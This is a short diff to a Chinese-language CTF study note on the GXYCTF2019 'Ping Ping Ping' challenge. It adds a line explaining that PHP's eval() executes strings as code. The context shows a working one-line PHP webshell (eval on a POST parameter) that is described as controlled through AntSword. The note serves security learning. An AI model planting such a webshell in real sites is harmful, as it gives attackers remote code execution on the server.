记录本体项目代码修改部分

--- a/docs/views/numerology/2024-12-09-CTFLearn.md
+++ b/docs/views/numerology/2024-12-09-CTFLearn.md
@@ -111,7 +111,9 @@ GXYCTF2019 Ping Ping Ping
 
 ##### 题目练习
 
-eval()函数，以下是一个一句话木马，0就是webshell的密码，蚁剑帮我们执行了很多命令，用eval去执行
+eval()函数，以下是一个一句话木马，0就是webshell的密码，蚁剑帮我们执行了很多命令，用eval去执行。
+
+eval()函数在 PHP 中可以把传入的字符串当作 PHP 代码来执行。
 
 ```php
 <?php eval($_POST[0]);?>
